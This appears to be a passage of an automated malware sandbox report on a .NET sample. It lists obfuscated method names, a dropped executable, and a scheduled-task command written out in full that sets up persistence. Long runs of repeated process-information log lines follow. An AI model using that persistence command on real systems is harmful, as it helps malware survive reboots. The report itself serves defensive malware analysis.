              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, lbLTaRxgfXRGqTblEm.csHigh entropy of concatenated method names: 'eNgaMEdkH', 'JpNOOy81i', 'tnOxKGS1O', 'uPqKFxMD4', 'SFtps0bye', 'SA99bPNxE', 'B4qs6Gp6CMr84nYLfh', 'ptymZZCapnEu1aXO3X', 'QVMSrUUun', 'YsiLJIE9t'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, veJXLfyoHmFXwtyvub.csHigh entropy of concatenated method names: 'v8iwVHekCX', 'pcYw6nNUs6', 'Wkjwa4EbFU', 'gjkwOPgOWD', 'LdMw8caS8G', 'wFYwxx5HIN', 'd0gwKBoPIF', 'CsgwrOoNjR', 'b1Iwp8kVOd', 'Tu0w9A8H3f'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, krOEoKdZ175xes5hVvW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rPvLqvrPid', 'ntfLMLLDIF', 'XDxL307qQx', 'k6kLhYJS0L', 'UsfLFdbQFo', 'NdDLibuQZY', 'tOBLJPGp24'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, BWVXhLFpxwXuIlrnqD.csHigh entropy of concatenated method names: 'TjNQ4v6gLJ', 'u46QAoLR4P', 'LC7QqZZx1I', 'DRIQMe94kB', 'BMHQNIMUMZ', 'vbGQDnNloO', 'F1KQtogPCA', 'TopQZ18G0k', 'OppQ5g2sfD', 'i2LQ1FINK5'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, uCAHc2H8uPvOyq91xE.csHigh entropy of concatenated method names: 'o3fSY4bSR8', 'bhNSEBFh6c', 'LB3Semm0Tx', 'x1gSgMJG29', 'GSqS2oRr0a', 'JqHSwTTjRG', 'WPsSB871YT', 'pGfSPy8cF3', 'HsZSWhIjYi', 'ksPSk6AQac'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, rd0AEsXn1MeCQ1jiLQ.csHigh entropy of concatenated method names: 'aS42fUPb52', 'qbE2E7HHu5', 'hJ52g5x2jC', 'jTk2wCJV7K', 'pjw2BRcKSD', 'Y93gFsdq8Z', 'MY9giDCH2r', 'VgkgJC0Q0U', 'oGBgjIUmQZ', 'mgcgUaGysY'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, LKw1V4s2PCsbLttJoI.csHigh entropy of concatenated method names: 'yFEorGbiCC', 'EIWopFsXGC', 'AAhoHNgkDB', 'JtAoNU42UR', 'e4noteBeim', 'GgVoZE2lMq', 'HCCo1TKYms', 'Gr3o7fAqii', 'Smoo4fJHPv', 'hmso0FfSBG'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, s2abX12Byym4oB7iuy.csHigh entropy of concatenated method names: 'pO5nfPdrm3', 'RvLnY7TQW0', 'dtDnErmiG3', 'xXyner8l7g', 'YHRngQgLdq', 'Jsfn2kuRuV', 'LxDnwgb7qN', 'e6HnB9TkJm', 'YBPnPsZs6f', 'rqjnWnSQ6g'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, xlb0mPuHJiDuJuLogE.csHigh entropy of concatenated method names: 'eL8Ij6aa0e', 'LdiIbm6BZf', 'JlkSCgAffZ', 'SbrSGqBxSv', 'D2II0xmKhq', 'ADOIAPihVD', 'Hv8IcP0Xyf', 'JsTIqlbICQ', 'LtJIMsxH5N', 'yy7I3SW0nj'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, rG3ivKtFPkYayP4877.csHigh entropy of concatenated method names: 'AoNGwLuRdD', 'hsBGBEdKiK', 'j0nGWiYtI0', 'j6vGkuowhD', 'xN4GQRiqDs', 'duVGl4iTar', 'fE7ucvxtdWqVihhuLs', 'IZOHK7TQAB2X6nA8pB', 'Et6GGkrE1i', 'JE2Gnt5Lqf'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, a5vw6tPu7hcEKmEZZy.csHigh entropy of concatenated method names: 'AQyXGuUct7', 'eKXXno1YE3', 'jmkXu5EYVp', 'TngXYekLJd', 'SK7XEsDhAm', 'AroXgIKx8C', 'HdsX2dpW1v', 'WEHSJF00Bc', 'sH4SjTmHC0', 'WWVSUhmbZi'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, mKgtOOfgJSjP9ZL2Ml.csHigh entropy of concatenated method names: 'Dispose', 'WfYGUCr3e9', 'MK4RNFTZqv', 'lnQddblWij', 'MZRGbhZh0v', 'TbgGzneQYj', 'ProcessDialogKey', 'MerRCCLPhl', 'I6FRG3loMf', 'nOjRRSPvP4'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, o4ucp15D8ToPweuH8X.csHigh entropy of concatenated method names: 'hwgeOD2okP', 'f20exe5y19', 'xGherWUjkS', 'uCEepZkEYJ', 'YbbeQYE6Qo', 'LOMel319cj', 'v2meIuOOeB', 'd2heSChUpL', 'om1eXnQlUN', 'buneLNxtDb'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, vA0utDi6kalJK77o62.csHigh entropy of concatenated method names: 'ToString', 'cSDl0UZLXc', 'hVQlNLVKCI', 'TCNlDyPZUG', 'YdBlthYikk', 'HBdlZjyvfE', 'VZGl5NhByM', 'wFPl1RyHoD', 'gq0l7dQc0P', 'EQ4lsBXL09'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, I6XRnF4LP5JevZQ7NP.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'DA3RUPx6w4', 'VkPRbn50ij', 'L8eRzc3lam', 'kvunCGZE4v', 'rYwnGLdZBa', 'cnxnRlLJDX', 'zV5nn7A8dQ', 'a9BSgTji8UAfUhgACWL'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, L8Zd5QMXQQ43AtbYpO.csHigh entropy of concatenated method names: 'D3ZEqRT6BP', 'J9LEMyZaUn', 'AgOE3sNYTF', 'JjCEhLtQhP', 'RtmEFgBCGR', 'K8PEisHiMu', 'Mf7EJQrhjk', 'VwtEjWbPVM', 'G4IEUCZx04', 'BiQEbCPrMM'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, LST1w7z1Z4AxPZ1MSI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Oj4XoQ1TjF', 'XrVXQrsHbo', 'PudXlvSAed', 'Vn1XI8csdt', 'CpCXST1tvk', 'o85XXt8OAB', 'gwlXLIob3U'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, TckNgadhVo6yQFljfHj.csHigh entropy of concatenated method names: 'MYkXVPBTOF', 'LyIX6RIy8J', 'QY8XaTnuZ6', 'YsBXObsSe0', 'RWsX8jwIxv', 'MePXxJVXXk', 'eeWXKrDVU7', 'S33Xr1R8qo', 'wBBXpMTWdY', 'nXiX9ID3rb'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, ljk4duRsWmsI2jrfts.csHigh entropy of concatenated method names: 'WtDSHY9gLf', 'sR6SNI6HY1', 'HvjSDRCmwq', 'mPgStVHUJd', 'lGZSqrm0qA', 'xJFSZQgTDI', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, Sjnl6VU2hM4EhJtoFJ.csHigh entropy of concatenated method names: 'S4Bg8dM60o', 'i7IgKhmltw', 'oS0eDycI2q', 'YXIetxxQEE', 'nMweZm7e9V', 'vQye5V2ff3', 'swWe19F8kQ', 'jNie7UxT8R', 'YLbesW52i1', 'fYhe4xfgf6'
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, lbLTaRxgfXRGqTblEm.csHigh entropy of concatenated method names: 'eNgaMEdkH', 'JpNOOy81i', 'tnOxKGS1O', 'uPqKFxMD4', 'SFtps0bye', 'SA99bPNxE', 'B4qs6Gp6CMr84nYLfh', 'ptymZZCapnEu1aXO3X', 'QVMSrUUun', 'YsiLJIE9t'
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeFile created: C:\Users\user\AppData\Roaming\aWBoUwiux.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
